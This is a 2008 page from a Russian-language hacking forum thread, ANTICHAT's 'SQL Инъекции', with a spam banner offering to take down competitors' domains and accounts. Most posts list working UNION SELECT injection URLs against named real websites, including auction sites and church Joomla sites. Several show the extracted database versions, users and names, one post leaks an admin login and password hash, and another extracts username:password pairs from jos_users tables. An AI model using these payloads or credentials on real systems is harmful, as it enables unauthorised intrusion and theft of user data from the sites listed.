УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 577 из 1604

577

Опции темы

Поиск в этой теме

Опции просмотра

#5761

20.06.2008, 05:48

XJIOP

Познающий

Регистрация: 23.03.2005

Сообщений: 40

Провел на форуме:
44404

Репутация: 13

Отправить сообщение для XJIOP с помощью ICQ

Код:

http://www.jumpbite.com/browse.php?cat=15&page=0.01

#5762

20.06.2008, 07:12

Bаltazor

Новичок

Регистрация: 18.06.2008

Сообщений: 3

Провел на форуме:
18067

Репутация: 3

Вот:

Цитата:

http://www.esen.education.fr/fr/ressources-par-type/detail-d-une-ressource/?idRessource=874=662e308c5d=1

#5763

20.06.2008, 16:51

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

Код:

http://www.bahamasdevelopmentbank.com/feature.php?id=-1+union+select+all+1,concat(user,0x3a,password),3,null,5,6,7+from+mysql.user+limit+1,1--

#5764

20.06.2008, 18:38

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

вот сегодня насобирал..

Цитата:

http://www.myauctionplanet.com/category.php?cate_id=0+union+select+1,version(),3/*

4.1.22-standard

Цитата:

http://www.myfundraisingauction.com/category.php?cate_id=-1283+union+select+1,version(),3,4/*

4.1.22-standard

Цитата:

http://www.point5.co.nz/category.php?cate_id=1+union+select+1,version(),3, 4/*

4.1.22-standard

Цитата:

http://www.tapinglobal.com/category.php?cate_id=-578+union+select+1,version(),3/*

5.0.45-community-log

Цитата:

http://www.loopp.com/00/navi/category.php?cate_id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,version(),29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62, 63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78/*

4.1.22-standard-log

Цитата:

http://www.dichroicimagery.com/auction/category.php?view=gallery&cate_id=-140+union+select+1,2,3,4,unhex(hex(version())),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52/*

4.1.16

Цитата:

http://kiwibidz.com/category.php?cate_id=-965+union+select+1,version(),3,4/*

5.0.45

Цитата:

http://schoolhotlunch.org/category.php?cate_id=-10+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*&view=list

4.1.20-max-log::avanti_school@76.162.254.228::avanti_school

Цитата:

http://www.buyskool.com/category.php?cate_id=-730+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*&view=list

4.1.22-standard::wwwbuys_admin@localhost::wwwbuys_masterd b

Цитата:

http://bid4tackle.com/category.php?cate_id=-13+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*

5.0.45-log::micheal8311@10.3.16.1::bid4tackle

Цитата:

http://egyptexporters.com/category.php?cate_id=-109+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*

4.1.21-standard::webart_eexport@localhost::webart_export

Цитата:

http://market4d.com/category.php?cate_id=-140+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*

5.0.45::market@localhost::market

Цитата:

http://bidonlots.com/category.php?view=list&cate_id=-611+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3--

5.0.51a-community::wwwbil_peter@localhost::wwwbil_AJauctio n

Цитата:

http://www.zbid.co.uk/category.php?view=list&cate_id=-982+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*

4.1.22-standard::zbidco_auction@localhost::zbidco_auction e

Цитата:

http://nooglebid.com/category.php?cate_id=-156+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4--

5.0.51-log::thamesn_steve@web10.hostedservice.co.uk::tham esn_nooglebid

Цитата:

http://www.farmtofarm.net/category.php?view=list&cate_id=-1147+union+select+1,concat_ws(0x3a3a,version(),use r(),database()),3,4/*

4.1.22-standard-log::farmtofa_gerard@localhost::farmtofa_farmtofar m

Цитата:

http://repeatbargains.net/category.php?cate_id=-112+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*

5.0.45::repeat@localhost::repeat

Цитата:

http://auction434u.com/category.php?view=gallery&cate_id=-125+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*

5.0.22::auction_admin@localhost::auction

Цитата:

http://www.free-auction.cn/category.php?cate_id=-71+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3/*

5.0.41-community-log::brownte_jsf@98.130.2.3::brownte_free-auction

Цитата:

http://www.grosist.ro/category.php?cate_id=-81+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*

4.1.20::bafgrosist@localhost:

mgrosist

Последний раз редактировалось gisTy; 20.06.2008 в 20:26..

#5765

20.06.2008, 19:43

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

gisTy

Цитата:

http://www.africanfreemarket.com

admin:$1$0da78.Z1$Z7LSg2oGyC1a6im6EqaSz1:admin@afr icafreebay.com

Цитата:

http://www.ebay-clone.com

admin:admin:admin@ajsquare.com

Последний раз редактировалось sabe; 20.06.2008 в 20:23..

#5766

20.06.2008, 20:28

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

sabe, почистил. спс что показал

Последний раз редактировалось gisTy; 20.06.2008 в 20:31..

#5767

20.06.2008, 20:31

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

Немольшая потборка

--
http://www.arcdi.com/trainers.php?id=-33+union+select+1,concat(username,0x3a,password),3 ,4,5+FROM+users%20--[/code]neeblee.com

http://www.neeblee.com/plaincart/index.php?c=39&p=-33+union+select+1,concat_ws(0x3,user_name,user_pas sword),3,4,5+from+tbl_user/*

--

PHP код:

/* <v5_01> (SQL INJ) http://www.prbc.org.au/churchsite/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.choosedestiny.com/index2.php?option=com_prayercenter&task=view_reque st&id=- 1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.prbc.org.au/churchsite/index.php?option=com_prayercenter&Itemid=51/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://connectinchrist.com/component/option,com_prayercenter/Itemid,74/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.worlddayofprayeraustralia.org/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://connectinchrist.com/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.ejesus.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.threecordstrand.net/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.threecordstrand.net/index.php?option=com_prayercenter&Itemid=30/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.icfaustralia.org.au/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.ejesus.com.br/index.php?option=com_prayercenter&Itemid=78/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.icfaustralia.org.au/index.php?option=com_prayercenter&Itemid=41/index2.php?option=com_prayercenter&task=view_reque st&id=1+UNION+SELECT+user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.promvr.com.br/principal/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.ibbt.org.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.ibbt.org.br/index.php?option=com_prayercenter&task=view/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.rccsaopaulo.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.rccgoias.org.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.rccsaopaulo.com.br/index.php?option=com_prayercenter&task=subscribe&I temid=/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.rccgoias.org.br/index.php?option=com_prayercenter&task=view/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.iem.org.br/site/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.iem.org.br/site/index.php?option=com_prayercenter&Itemid=69/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://igrejabatistaagape.org.br/joomla/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://gpom.com.br/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://gpom.com.br/index.php?option=com_prayercenter&task=new&Itemid=/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.canaljesus.com.br/media/option,com_prayercenter/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- <v5_01> (SQL INJ) http://www.canaljesus.com.br/media/option,com_prayercenter/Itemid,45.aspx/index2.php?option=com_prayercenter&task=view_reque st&id=-1+UNION+SELECT+user(),user(),concat(username,0x3a, password),user(),user(),user(),user(),user(),user( ),user(),user(),user(),user()+FROM+jos_users-- *\

#5768

20.06.2008, 21:31

Fata1ex

Постоянный

Регистрация: 12.12.2006

Сообщений: 906

Провел на форуме:
4205500

Репутация: 930

.is

Сегодня ужасный недохек

Но зато отличные домены ) ir.is / fg.is / 69.is / numi.is / php.internet.is

Код:

PR - 4
http://www.acsr.be/artic_gen.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

PR - 5
http://69.is/openlink.php?id=52900+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

PR - 5
http://www.ornefni.is/n-greinar2.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10/*


http://php.internet.is/kraftaheimar/lesa_frettina.php?id=-2187+union+select+1,2,3,4,5,6,7,8,9,10/*

Цитата:

http://numi.is/fullfrettir.php?id=-9+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),v ersion(),database()),8,9/*

numiuser@server2.hysir.net:4.1.20-log:numi

PR - 4

Цитата:

http://www.fg.is/page.php?id=-35+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6/*

fguser@localhost:4.1.20-log:fg

PR - 5

Цитата:

http://www.ir.is/1.3.svid.php?id=-7+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4/*

srr@localhost:5.0.32-Debian_7etch5-log:nam

Кто докрутит - выкладывайте ) Там много где 4М, так что подбором токо

Без дефейсов пожалуйсто )

#5769

20.06.2008, 22:18

XJIOP

Познающий

Регистрация: 23.03.2005

Сообщений: 40

Провел на форуме:
44404

Репутация: 13

еще одна ошибка в Limit

Код:

http://hq-films.ws/browse.php?page=0.01

кстати реально ченить с этой ошибкой сделать?

#5770

21.06.2008, 00:45

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

еще чуть-чуть от меня...

PR 4

Цитата:

http://www.emajonline.com/index.php?action=1&extra=educators_list.php&cat_id =-53+union+select+1,2,3,4,5,concat_ws(0x3a3a,version (),user(),database()),7/*

4.1.22-standard::emajo2_webuser@localhost::emajo2_emaj

PR 4

Цитата:

http://www.queerzagreb.org/new/index.php?page=article_en&cat_id=15&id=-121+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a3 a,version(),user(),database()))),6,7,8,9,10,11,12/*

4.1.11-Debian_4sarge7-log::qu2zg@localhost::queer2

PR 4

Цитата:

http://www.trenerski-forum.hr/index.php?page=category&cat_id=4+union+select+1,un hex(hex(concat_ws(0x3a3a,version(),user(),database ()))),3,4,5,6,7,8,9,10,11/*&lang=hr

4.1.11-Debian_4sarge7-log::trenersk@localhost::trenersk

PR 2

Цитата:

http://www.hotel-drava.com/index.php?page=article&id=21+union+select+1,unhex( hex(concat_ws(0x3a3a,version(),user(),database())) ),3,4,5,6,7,8,9,10,11,12/*

4.1.20::hdrava@localhost::content

Цитата:

http://www.mrkzapresic.hr/index.php?page=article&id=5+union+select+1,unhex(h ex(concat_ws(0x3a3a,version(),user(),database()))) ,3,4,5,6,7,8,9,10,11,12,13,14/*

4.1.11-Debian_4sarge7-log::mrkzapresic@localhost::mrkzapr

Последний раз редактировалось gisTy; 21.06.2008 в 00:56..